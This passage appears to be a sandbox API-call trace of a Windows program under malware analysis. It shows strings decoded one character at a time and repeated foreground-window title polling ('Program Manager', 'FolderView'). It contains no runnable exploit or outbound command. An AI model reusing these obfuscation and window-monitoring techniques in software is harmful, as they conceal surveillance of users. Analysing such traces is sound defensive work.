CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.809] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.809] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.810] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.810] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.811] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.811] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.812] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.812] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.813] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.813] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.814] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.814] GetForegroundWindow () returned 0x20086 [0180.814] GetLastError () returned 0x0 [0180.814] SysStringLen (param_1=" ") returned 0xff [0180.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.814] SysStringLen (param_1=" ") returned 0xff [0180.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.815] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.815] GetLastError () returned 0x0 [0180.815] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.815] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.816] SysStringLen (param_1="Prog") returned 0x4 [0180.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x11684fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0180.816] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0180.816] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0180.817] GetFocus () returned 0x0 [0180.817] lstrlenA (lpString="Prog") returned 4 [0180.817] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0180.817] IsWindow (hWnd=0x103c4) returned 1 [0180.817] IsWindow (hWnd=0x103c4) returned 1 [0180.818] IsWindow (hWnd=0x103c4) returned 1 [0180.818] IsWindow (hWnd=0x103c4) returned 1 [0180.818] GetFocus () returned 0x0 [0180.818] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.819] GetFocus () returned 0x0 [0180.819] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0180.819] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0180.819] GetFocus () returned 0x0 [0180.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0180.819] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.819] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.821] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0180.821] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.822] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0180.822] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.823] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.823] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.823] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.824] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.825] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.825] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.825] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.826] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.826] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.827] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.828] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.828] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.829] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.829] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.829] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.830] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.830] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.831] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.831] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.831] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.832] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.832] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.833] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.833] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.834] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.834] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.835] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.835] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.836] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.836] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.837] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.837] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.838] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.838] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.839] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.839] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.840] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.840] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.841] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.841] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.841] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.842] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.842] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.842] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.843] GetForegroundWindow () returned 0x1011a [0180.843] GetLastError () returned 0x0 [0180.843] SysStringLen (param_1=" ") returned 0xff [0180.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.843] SysStringLen (param_1=" ") returned 0xff [0180.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.843] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0180.844] GetLastError () returned 0x0 [0180.844] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.844] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | 